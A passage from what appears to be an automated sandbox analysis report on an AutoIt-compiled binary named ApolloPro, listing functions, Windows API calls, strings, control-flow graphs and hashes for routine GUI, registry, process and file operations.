                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 0069419B
                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00694245
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                              • String ID:
                                                                                              • API String ID: 420147892-0
                                                                                              • Opcode ID: 03529bbe949964b26267945c3790542942c4b88b02fae419a03db6a7d8c020d2
                                                                                              • Instruction ID: 4dbcbbc3e7ed72003c534732fa3760fd0b0c5751e7704d63355c4753ba00b260
                                                                                              • Opcode Fuzzy Hash: 03529bbe949964b26267945c3790542942c4b88b02fae419a03db6a7d8c020d2
                                                                                              • Instruction Fuzzy Hash: 96319F711083419FD704EF90D885EAFBBEABF96350F04052DF585C61A1EF719A8ACB92
                                                                                              Function 0063B020 Relevance: 5.6, APIs: 3, Instructions: 1146COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00643740: CharUpperBuffW.USER32(?,006F71DC,00000001,?,00000000,006F71DC,?,006353A5,?,?,?,?), ref: 0064375D
                                                                                              • _memmove.LIBCMT ref: 0063B68A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharUpper_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 2819905725-0
                                                                                              • Opcode ID: d58ffb119a715e5fea68dffaec35e4107a71e197f104d6e11c895cd3f5b7d4ca
                                                                                              • Instruction ID: 53ebdd067c1c3e63bc4e8dd2b38c5c9be09bf3b287b93903b811c1b2f9f247da
                                                                                              • Opcode Fuzzy Hash: d58ffb119a715e5fea68dffaec35e4107a71e197f104d6e11c895cd3f5b7d4ca
                                                                                              • Instruction Fuzzy Hash: 5EA278706087518FD760CF18C480B6AB7E2FF85304F14996DE99A8B362DB71ED46CB92
                                                                                              Function 006394E0 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bf780099e7f2dff4a95100b9951845556f321eb20422ffab71e08468cbf0c194
                                                                                              • Instruction ID: 523f478b5cd7eddddaa83bd1497eab37c4a92194db9d0959d9e2e1e8b3109248
                                                                                              • Opcode Fuzzy Hash: bf780099e7f2dff4a95100b9951845556f321eb20422ffab71e08468cbf0c194
                                                                                              • Instruction Fuzzy Hash: 1022AB70A04206CFDB24DF54C490BAEB7B2FF45310F148569E95AAB381E7B0A985CFE1
                                                                                              Function 0063BC70 Relevance: 50.4, APIs: 22, Strings: 6, Instructions: 1379sleeptimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • timeGetTime.WINMM ref: 0063BF57
                                                                                                • Part of subcall function 006352B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006352E6
                                                                                              • Sleep.KERNEL32(0000000A,?,?), ref: 006736B5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePeekSleepTimetime
                                                                                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                                                              • API String ID: 1792118007-922114024
                                                                                              • Opcode ID: 24a1dd767860303cfe0af0d3085da5237d08fb30c51d2525979864d0d6cf3fce
                                                                                              • Instruction ID: 16c199438266dc64f1c0c67acf4ae3d08d2d9ff5375ed340bc88c90ad07ef8c8
                                                                                              • Opcode Fuzzy Hash: 24a1dd767860303cfe0af0d3085da5237d08fb30c51d2525979864d0d6cf3fce
                                                                                              • Instruction Fuzzy Hash: DCC2CF70608341DFD768DF24C884BAAB7E6BF84300F14891DF58A9B3A1DB71E945DB86
                                                                                              Function 006333E7 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 70windowregistryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00633444
                                                                                              • RegisterClassExW.USER32(00000030), ref: 0063346E
                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0063347F
                                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 0063349C
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006334AC
                                                                                              • LoadIconW.USER32(000000A9), ref: 006334C2
                                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006334D1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                              • API String ID: 2914291525-1005189915
                                                                                              • Opcode ID: c0e62fba2785a29d720851cddfda4f17fb5bd630e9fa4142140535776838a814
                                                                                              • Instruction ID: 7de592cdaea6097dd1f3f904c99b6cadf0bc3aa92a8f882a0dd418f081e2334e
                                                                                              • Opcode Fuzzy Hash: c0e62fba2785a29d720851cddfda4f17fb5bd630e9fa4142140535776838a814
                                                                                              • Instruction Fuzzy Hash: 443147B1905309EFEB408FA4EC88BE9BBF2FB09310F10512AE551A62A0D7B51551CF90
                                                                                              Function 00633411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00633444
                                                                                              • RegisterClassExW.USER32(00000030), ref: 0063346E
                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0063347F
                                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 0063349C
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006334AC
                                                                                              • LoadIconW.USER32(000000A9), ref: 006334C2
                                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006334D1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                              • API String ID: 2914291525-1005189915
                                                                                              • Opcode ID: 08f366b0b29a370b2789b99065d11f9b3455830bdbdd5d30df89b0c34e50cdc3
                                                                                              • Instruction ID: 98bbac07ec6eca84500f9cd5ae039864d78bbc2998096432ff62b731b9cd9c85
                                                                                              • Opcode Fuzzy Hash: 08f366b0b29a370b2789b99065d11f9b3455830bdbdd5d30df89b0c34e50cdc3
                                                                                              • Instruction Fuzzy Hash: AF21E5B1905308EFEB009FA4EC89BADBBF6FB08710F00611AF525A62A0D7B15540CFA1
                                                                                              Function 00642FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 006500CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00643094), ref: 006500ED
                                                                                                • Part of subcall function 006508C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0064309F), ref: 006508E3
                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 006430E2
                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 006801BA
                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 006801FB
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00680239
                                                                                              • _wcscat.LIBCMT ref: 00680292
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                              • API String ID: 2673923337-2727554177
                                                                                              • Opcode ID: 2d4993322eb834f88796d9fb07e4e66282cc5178a6eef1f4da2cbaca38df8852
                                                                                              • Instruction ID: f11ae1cd459f62bfd42615895eb0348a9e8c1b3cb7ec1dfd4af9aa847acf0609
                                                                                              • Opcode Fuzzy Hash: 2d4993322eb834f88796d9fb07e4e66282cc5178a6eef1f4da2cbaca38df8852
                                                                                              • Instruction Fuzzy Hash: 0171AE715053019ED740EF25EC919ABBBEAFF46310F401A2EF545872A1EF70EA48CB96
                                                                                              Function 0064514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00645156
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00645165
                                                                                              • LoadIconW.USER32(00000063), ref: 0064517C
                                                                                              • LoadIconW.USER32(000000A4), ref: 0064518E
                                                                                              • LoadIconW.USER32(000000A2), ref: 006451A0
                                                                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 006451C6
                                                                                              • RegisterClassExW.USER32(?), ref: 0064521C
                                                                                                • Part of subcall function 00633411: GetSysColorBrush.USER32(0000000F), ref: 00633444
                                                                                                • Part of subcall function 00633411: RegisterClassExW.USER32(00000030), ref: 0063346E
                                                                                                • Part of subcall function 00633411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0063347F
                                                                                                • Part of subcall function 00633411: InitCommonControlsEx.COMCTL32(?), ref: 0063349C
                                                                                                • Part of subcall function 00633411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006334AC
                                                                                                • Part of subcall function 00633411: LoadIconW.USER32(000000A9), ref: 006334C2
                                                                                                • Part of subcall function 00633411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006334D1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                              • String ID: #$0$AutoIt v3
                                                                                              • API String ID: 423443420-4155596026
                                                                                              • Opcode ID: d8e6af477ebcd35c7c8a5016e2946b7f0e4281d63308e46e1e1c95add46af4d3
                                                                                              • Instruction ID: fc170e624ace363256f60132a2d872e1b456cf03dac324c3984f10e06621cf01
                                                                                              • Opcode Fuzzy Hash: d8e6af477ebcd35c7c8a5016e2946b7f0e4281d63308e46e1e1c95add46af4d3
                                                                                              • Instruction Fuzzy Hash: 78211771D04308EFEB109FA4ED09BAD7FB6FB08725F00615AF504A62A1D7B69660CF94
                                                                                              Function 00644D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 920 644d83-644dd1 922 644e31-644e33 920->922 923 644dd3-644dd6 920->923 922->923 924 644e35 922->924 925 644e37 923->925 926 644dd8-644ddf 923->926 929 644e1a-644e22 DefWindowProcW 924->929 930 644e3d-644e40 925->930 931 6809c2-6809f0 call 63c460 call 63c483 925->931 927 644de5-644dea 926->927 928 644ead-644eb5 PostQuitMessage 926->928 932 644df0-644df2 927->932 933 680a35-680a49 call 692cce 927->933 936 644e61-644e63 928->936 935 644e28-644e2e 929->935 937 644e65-644e8c SetTimer RegisterWindowMessageW 930->937 938 644e42-644e43 930->938 965 6809f5-6809fc 931->965 939 644eb7-644ec1 call 645b29 932->939 940 644df8-644dfd 932->940 933->936 956 680a4f 933->956 936->935 937->936 941 644e8e-644e99 CreatePopupMenu 937->941 944 680965-680968 938->944 945 644e49-644e5c KillTimer call 645ac3 call 6334e4 938->945 958 644ec6 939->958 946 680a1a-680a21 940->946 947 644e03-644e08 940->947 941->936 951 68096a-68096c 944->951 952 68099e-6809bd MoveWindow 944->952 945->936 946->929 962 680a27-680a30 call 688854 946->962 954 644e0e-644e14 947->954 955 644e9b-644eab call 645bd7 947->955 959 68098d-680999 SetFocus 951->959 960 68096e-680971 951->960 952->936 954->929 954->965 955->936 956->929 958->936 959->936 960->954 966 680977-680988 call 63c460 960->966 962->929 965->929 970 680a02-680a15 call 645ac3 call 6459d3 965->970 966->936 970->929
                                                                                              APIs
                                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 00644E22
                                                                                              • KillTimer.USER32(?,00000001), ref: 00644E4C
                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00644E6F
                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00644E7A
                                                                                              • CreatePopupMenu.USER32 ref: 00644E8E
                                                                                              • PostQuitMessage.USER32(00000000), ref: 00644EAF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                              • String ID: TaskbarCreated
                                                                                              • API String ID: 129472671-2362178303
                                                                                              • Opcode ID: a6aaf0b98b974fddd1a0381a55613b36c12f8c984305313a2d9127c41e7fea1a
                                                                                              • Instruction ID: fa28b68a64f738b54e86717f49c2d8cc4ad070b01f5b378a0588766f37821500
                                                                                              • Opcode Fuzzy Hash: a6aaf0b98b974fddd1a0381a55613b36c12f8c984305313a2d9127c41e7fea1a
                                                                                              • Instruction Fuzzy Hash: E041083124820AABFF556F24DC4FBBE3A97F754301F002629F602922A2CF629C51E775
                                                                                              Function 0063AD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 977 63ad98-63add1 978 672f63-672f64 DestroyWindow 977->978 979 63add7-63aded mciSendStringW 977->979 985 672f6f-672f7c 978->985 980 63adf3-63adfb 979->980 981 63afc0-63afcd 979->981 984 63ae01-63ae10 call 63c71f 980->984 980->985 982 63aff2-63aff9 981->982 983 63afcf-63afea UnregisterHotKey 981->983 982->980 987 63afff 982->987 983->982 986 63afec-63afed call 650dd1 983->986 998 63ae16-63ae1e 984->998 999 672fb9-672fc5 984->999 989 672f7e-672f81 985->989 990 672fab-672fb2 985->990 986->982 987->981 994 672f83-672f8b call 6442cf 989->994 995 672f8d-672f90 FindClose 989->995 990->985 992 672fb4 990->992 992->999 997 672f96-672fa3 994->997 995->997 997->990 1001 672fa5-672fa6 call 69a20c 997->1001 1004 63ae24-63ae49 call 634dc0 998->1004 1005 672fdd-672fea 998->1005 1002 672fc7-672fc9 FreeLibrary 999->1002 1003 672fcf-672fd6 999->1003 1001->990 1002->1003 1003->999 1007 672fd8 1003->1007 1014 63ae80-63ae8b CoUninitialize 1004->1014 1015 63ae4b 1004->1015 1009 673011-673018 1005->1009 1010 672fec-673009 VirtualFree 1005->1010 1007->1005 1009->1005 1012 67301a 1009->1012 1010->1009 1011 67300b-67300c call 69a266 1010->1011 1011->1009 1018 67301f-673022 1012->1018 1014->1018 1019 63ae91-63ae96 1014->1019 1017 63ae4e-63ae7e call 64fd60 call 64fdf5 1015->1017 1017->1014 1018->1019 1021 673028-67302c call 697079 1018->1021 1022 673033-673040 call 69a240 1019->1022 1023 63ae9c-63aea6 1019->1023 1029 67302e 1021->1029 1036 673042 1022->1036 1025 63b001-63b00e call 650abc 1023->1025 1026 63aeac-63af22 call 641cb6 call 64fef1 call 644c0a call 65052f call 641cb6 call 634dc0 call 650989 call 650b4f * 3 1023->1026 1025->1026 1037 63b014 1025->1037 1040 673047-673054 call 68d5cb 1026->1040 1070 63af28-63af3b call 6313ae 1026->1070 1029->1019 1036->1040 1037->1025 1046 673056 1040->1046 1049 67305b-673068 call 6503e3 1046->1049 1055 67306a 1049->1055 1058 67306f-67307c call 687236 1055->1058 1064 67307e 1058->1064 1067 673083-673090 call 69a224 1064->1067 1072 673092 1067->1072 1070->1049 1075 63af41-63af49 1070->1075 1076 673097-6730a4 call 69a224 1072->1076 1075->1058 1077 63af4f-63af6d call 641cb6 call 643868 1075->1077 1082 6730a6 1076->1082 1077->1067 1085 63af73-63af81 1077->1085 1082->1082 1085->1076 1086 63af87-63afbf call 641cb6 * 3 call 650351 1085->1086
                                                                                              APIs
                                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0063ADE1
                                                                                              • CoUninitialize.COMBASE ref: 0063AE80
                                                                                              • UnregisterHotKey.USER32(?), ref: 0063AFD7
                                                                                              • DestroyWindow.USER32(?), ref: 00672F64
                                                                                              • FreeLibrary.KERNEL32(?), ref: 00672FC9
                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00672FF6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                              • String ID: close all
                                                                                              • API String ID: 469580280-3243417748
                                                                                              • Opcode ID: 2d4f2c98a77ef99d355b704df3185013a7791d3a0e65b165973ef60471f69aea
                                                                                              • Instruction ID: 94387de4a4e263bda3769757a8bd24fd6b7c2c59135e774ceb498c1f1a75c6fc
                                                                                              • Opcode Fuzzy Hash: 2d4f2c98a77ef99d355b704df3185013a7791d3a0e65b165973ef60471f69aea
                                                                                              • Instruction Fuzzy Hash: A6A18D30701222CFDB69EF54C895A69F3A6BF04700F1482ADE80AAB351CB31ED56DF95
                                                                                              Function 006456F8 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00680C5B
                                                                                                • Part of subcall function 00641821: _memmove.LIBCMT ref: 0064185B
                                                                                              • _memset.LIBCMT ref: 00645787
                                                                                              • _wcscpy.LIBCMT ref: 006457DB
                                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006457EB
                                                                                              • __swprintf.LIBCMT ref: 00680CD1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                                                              • String ID: Line %d: $))$AutoIt -
                                                                                              • API String ID: 230667853-2986313055
                                                                                              • Opcode ID: 25eee0c6c9b87b2f9ae49ed116572e23e19fbe68175b6bc607a70229b3239a14
                                                                                              • Instruction ID: c6d84c89d7eca7dc8ef29006c55031d434fdd12418132b937ab3b4d453e78076
                                                                                              • Opcode Fuzzy Hash: 25eee0c6c9b87b2f9ae49ed116572e23e19fbe68175b6bc607a70229b3239a14
                                                                                              • Instruction Fuzzy Hash: 0841D671008300ABD3A1FB60DC85FEF77DEAF45354F100A2EF185921A2DB34A689C79A
                                                                                              Function 00697681 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1146 697681-6976d7 InterlockedExchange call 650fe6 * 2 ReadFile 1151 69778b-6977a7 call 65105c InterlockedExchange 1146->1151 1152 6976dd-6976e1 1146->1152 1153 697788 1152->1153 1154 6976e7-6976fc EnterCriticalSection 1152->1154 1153->1151 1156 69774d-697782 call 651070 LeaveCriticalSection ReadFile 1154->1156 1157 6976fe-69770d 1154->1157 1156->1152 1156->1153 1160 69770f 1157->1160 1161 697715-69774a call 66b5e6 call 650fe6 call 651070 call 65105c 1157->1161 1160->1161 1161->1156
                                                                                              APIs
                                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 00697698
                                                                                                • Part of subcall function 00650FE6: std::exception::exception.LIBCMT ref: 0065101C
                                                                                                • Part of subcall function 00650FE6: __CxxThrowException@8.LIBCMT ref: 00651031
                                                                                              • ReadFile.KERNELBASE(0000FFFF,00000000,0000FFFF,?,00000000), ref: 006976CF
                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 006976EB
                                                                                              • _memmove.LIBCMT ref: 00697739
                                                                                              • _memmove.LIBCMT ref: 00697756
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00697765
                                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0069777A
                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00697799
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
